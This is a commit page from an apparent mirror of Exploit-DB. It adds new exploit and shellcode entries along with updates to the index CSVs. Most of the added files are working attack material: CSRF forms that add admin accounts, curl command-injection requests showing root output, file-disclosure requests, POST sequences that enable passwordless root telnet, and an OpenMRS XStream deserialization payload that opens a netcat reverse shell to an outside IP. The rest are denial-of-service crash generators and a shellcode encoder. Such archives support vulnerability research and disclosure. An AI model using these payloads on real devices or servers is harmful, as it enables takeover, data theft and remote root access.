bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-06

Browse source 
11 changes to exploits/shellcodes

Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
River Past Audio Converter 7.7.16 - Denial of Service (PoC)
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution
BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure
devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery
devolo dLAN 550 duo+ Starter Kit - Remote Code Execution
Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery
OpenMRS Platform < 2.24.0 - Insecure Object Deserialization

Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)
This commit is contained in:
Offensive Security 2019-02-06 05:01:42 +00:00
parent 298b95e694
commit d667cf901c
13 changed files with 628 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

37
exploits/hardware/webapps/46317.txt Normal file
View file

@ -0,0 +1,37 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Unauthenticated RTSP Stream Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: BEWARD N100 camera suffers from an unauthenticated and unauthorized
live RTSP video stream access.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5509
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php
26.01.2019
--
http://TARGET/cgi-bin/view/image

51
exploits/hardware/webapps/46318.html Normal file
View file

@ -0,0 +1,51 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 CSRF Add Admin Exploit
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certai actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5510
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php
26.01.2019
--
<html>
<body>
<form action="http://TARGET/cgi-bin/admin/param">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="group" value="General.UserID" />
<input type="hidden" name="template" value="UserID" />
<input type="hidden" name="General.UserID.U.User" value="dGVzdDp0ZXN0MTIz,01000001" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Base64(test:test123) + ,01000001 for A (Admin) = dGVzdDp0ZXN0MTIz,01000001

67
exploits/hardware/webapps/46319.txt Normal file
View file

@ -0,0 +1,67 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from two authenticated command injection vulnerabilities.
The issues can be triggered when calling ServerName or TimeZone GET parameters
via the servertest page. This can be exploited to inject arbitrary system commands
and gain root remote code execution.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5512
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5512.php
26.01.2019
--
---------------------------
TimeZone command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:15:53 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK
-----------------------------
ServerName command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org|id||&TimeZone=03:00'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:22:11 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK

80
exploits/hardware/webapps/46320.txt Normal file
View file

@ -0,0 +1,80 @@
BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in fileread script is not properly
verified before being used to read files. This can be exploited to disclose
the contents of arbitrary files via absolute path or via the SendCGICMD API.
Tested on: Boa/0.94.14rc21
Farady ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
26.01.2019
--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6
Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL
--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf

41
exploits/hardware/webapps/46324.txt Normal file
View file

@ -0,0 +1,41 @@
devolo dLAN 550 duo+ Starter Kit Cross-Site Request Forgery
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The web application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. The
devolo web application uses predictable URL/form actions in a repeatable way.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5507
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php
04.10.2017
--
curl -i -s -k -X 'POST' \
-H 'Origin: http://DEVOLO-IP' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://DEVOLO-IP/cgi-bin/htmlmgr?_file=%2Fwgl%2Fmain.wgl&_sid=&_style=std&_lang=&_dir=expert&_page=time' \
--data-binary $'%3Asys%3ANTPClient.EnableNTP=on&%3Asys%3ANTPClient.NTPServer=waddup.com&%3Asys%3ANTPClient.GMTOffset=%2B01%3A00&%3Asys%3ANTPClient.AutoDaylightSaving=on&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=expert&_page=time&_idx=&_sid=&_csrf=' \
'http://DEVOLO-IP/cgi-bin/htmlmgr'
Even though there is a '_csrf' parameter that is being submited, it is never checked (nor it contains any value)

86
exploits/hardware/webapps/46325.txt Normal file
View file

@ -0,0 +1,86 @@
devolo dLAN 550 duo+ Starter Kit Remote Code Execution
Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)
Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.
Desc: The devolo firmware has what seems to be a 'hidden' services which
can be enabled by authenticated attacker via the the htmlmgr CGI script.
This allows the attacker to start services that are deprecated or discontinued
and achieve remote arbitrary code execution with root privileges.
Tested on: Linux 2.6.31
Vulnerability discovered by Stefan Petrushevski aka sm
@zeroscience
Advisory ID: ZSL-2019-5508
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php
04.10.2017
--
The htmlmgr cgi script that is accessible via web, does not validate or sanitize
the configuration parameters that a user wants to change. This allows an attacker
to change configuration parametersincluding parameters that are not even shown in
the web administration panel.
One service that is possible for an attacker to enable is telnet and remote maintenance
shell service and then proceed to login in with the 'root' user which doesn't have a password.
In order for an attacker to achieve this, he would need to change the following two values:
System.Baptization.Telnetd <- to enable telnet
System.Baptization.shell <- to enable remote maintenance shell
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.Telnetd=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Baptization.shell=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
Since the configuration is read from a file on boot time, an attacker would also
need to somehow make the device to restart. This can be done by issuing the 'reboot'
command again from the html cgi script: System.Reboot
--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP
%3Asys%3ASystem.Reboot=OLACANYOUREBOOT&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------
After the reboot the devolo device will have a telnet service on TCP port 23 opened
and an attacker can now login to the device with user 'root' and no password.
--------
Trying DEVOLO-IP...
Connected to DEVOLO-IP.
Escape character is '^]'.
dlanwireless login: root
# whoami
root
#
--------
The attacker then has complete access over the device. t00t.

19
exploits/hardware/webapps/46326.html Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: Zyxel VMG3312-B10B DSL-491HNU-B1B v2 modem CSRF Exploit
# Version: Zyxel VMG3312-B10B
# Tested on : Parrot Os
# Author: Yusuf Furkan
# Twitter: h1_yusuf
# CVE: CVE-2019-7391
# model name: DSL-491HNU-B1B v2
<html>
<!-- CSRF PoC - generated by Yusuf -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/login/login-page.cgi" method="POST">
<input type="hidden" name="AuthName" value="admin" />
<input type="hidden" name="AuthPassword" value="1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

102
exploits/java/webapps/46327.txt Normal file
View file

@ -0,0 +1,102 @@
Insecure Object Deserialization on the OpenMRS Platform
Vulnerability Details
CVE ID: CVE-2018-19276
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-502
CVSS Base Score: 10.0
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
JAVA 8 ENVIRONMENT
By injecting an XML payload in the following body request to the REST API provided by the application, an attacker could execute arbitrary commands on the remote system. The request below could be used to exploit the vulnerability:
POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1
Host: HOST
Content-Type: text/xml
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string>
<string>-c</string>
<string>nc -e /bin/sh 172.16.32.3 8000</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
The payload above was generated with the marshalsec tool and adapted to use multiple arguments because the original payload would not work well if the attacker need to send several arguments to a Linux host.. After the payload was sent, the handler successfully received a response:
~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Connection from 172.16.32.2:52434.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat
The response should contain an error message similar to the one below:
{"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
…omitted for brevity…
The response above showed that the REST Web Services module was unable to process the request properly. However, the payload was deserialized before it is caught by the exception handler, which allowed the team to gain shell access.

20
exploits/windows/dos/46321.py Executable file
View file

@ -0,0 +1,20 @@
#Exploit Title: Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-04
#Tested Version: 8.10.00.8925
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: Device_Monitoring_Studio_8.10.00.8925.py
#2.- Open code.txt and copy content to clipboard
#3.- Open Device Monitoring Studio
#4.- Select "Tools" > "Connect to New Server"
#5.- Select "Enter the name server or address" and Paste Clipboard
#6.- Select "Ok"
#7.- Crashed
cod = "\x41" * 1000
f = open('code.txt', 'w')
f.write(cod)
f.close()

28
exploits/windows/dos/46322.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: River_Past_Audio_Converter(DoS)
# Date: 05.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link :https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
# Exploit Author: Achilles
# Tested Version: 7.7.16
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:=20
# 1.- Run python code : River_Past_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open River_PastAudio_Converter.exe
# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Activation Code'
# 5.- Click 'Activate' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 3000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

16
files_exploits.csv
View file

@ -6296,6 +6296,8 @@ id,file,description,date,author,type,platform,port
46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40779,8 +40781,16 @@ id,file,description,date,author,type,platform,port
46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,
46310,exploits/php/webapps/46310.txt,"SuiteCRM 7.10.7 - 'parentTab' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
46311,exploits/php/webapps/46311.txt,"SuiteCRM 7.10.7 - 'record' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80
46310,exploits/php/webapps/46310.txt,"SuiteCRM 7.10.7 - 'parentTab' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,80
46311,exploits/php/webapps/46311.txt,"SuiteCRM 7.10.7 - 'record' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,80
46315,exploits/multiple/webapps/46315.txt,"Nessus 8.2.1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,
46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,
46317,exploits/hardware/webapps/46317.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure",2019-02-05,LiquidWorm,webapps,hardware,
46318,exploits/hardware/webapps/46318.html,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)",2019-02-05,LiquidWorm,webapps,hardware,80
46319,exploits/hardware/webapps/46319.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution",2019-02-05,LiquidWorm,webapps,hardware,80
46320,exploits/hardware/webapps/46320.txt,"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure",2019-02-05,LiquidWorm,webapps,hardware,80
46324,exploits/hardware/webapps/46324.txt,"devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery",2019-02-05,sm,webapps,hardware,80
46325,exploits/hardware/webapps/46325.txt,"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution",2019-02-05,sm,webapps,hardware,
46326,exploits/hardware/webapps/46326.html,"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery",2019-02-05,"Yusuf Furkan",webapps,hardware,80
46327,exploits/java/webapps/46327.txt,"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization",2019-02-05,"Bishop Fox",webapps,java,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -939,3 +939,4 @@ id,file,description,date,author,type,platform
46264,shellcodes/arm/46264.s,"Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86

1 id file description date author type platform
939 46264 shellcodes/arm/46264.s Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes) 2019-01-28 Gokul Babu shellcode arm
940 46277 shellcodes/linux_x86/46277.c Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes) 2019-01-29 Joao Batista shellcode linux_x86
941 46302 shellcodes/linux_x86/46302.c Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3) 2019-02-01 Kiewicz shellcode linux_x86
942 46323 shellcodes/linux_x86/46323.py Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator) 2019-02-05 Aditya Chaudhary shellcode linux_x86

83
shellcodes/linux_x86/46323.py Executable file
View file

@ -0,0 +1,83 @@
#!/usr/bin/python
# Python Random Insertion Encoder
# Author: Aditya Chaudhary
# Date: 5th Feb 2019
import random
import sys
import argparse
shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--entropy", help="Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)", type=int)
parser.add_argument("-b", "--badchars", help="Badchars to removed from inserted bytes", type=str)
args = parser.parse_args()
encoded = ""
encoded2 = ""
entropy = args.entropy
bad_chars = args.badchars
#print len(sys.argv)
#if len(sys.argv) > 1:
# entropy = int(sys.argv[1])
print '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)
#if len(sys.argv) < 3:
# print '[#] No Bad characters provided'
#else:
# bad_chars = str(sys.argv[2])
bad_chars = bad_chars.split(',')
print '[#] Bad chars: %s'%(bad_chars)
# Generate byte string from \x01 to \xff
chars = []
for o in range(256):
#print(hex(o))
ch = '%02x' % o
if ch not in bad_chars:
chars.append(ch)
print '[#] Generating Shellcode...'
repeat = 0
for x in bytearray(shellcode) :
repeat = random.randint(1, entropy)
#print "[#]"+str(repeat)
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x'
encoded += '%02x'% repeat
encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x'
encoded2 += '%02x,' % repeat
en_byte = ""
for i in range(1, repeat+1):
# print i
en_byte = chars[random.randint(0, len(chars)-1)]
encoded += '\\x%s' % en_byte
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x%s,' % en_byte
# encoded2 += '0x%02x,' % random.randint(1,255)
#encoded += '\n'
print '[#] Encoded shellcode:'
print encoded
print encoded2
print '[#] Shellcode Length: %d' % len(bytearray(shellcode))
print '[#] Encoded Shellcode Length: %d' % encoded.count('x')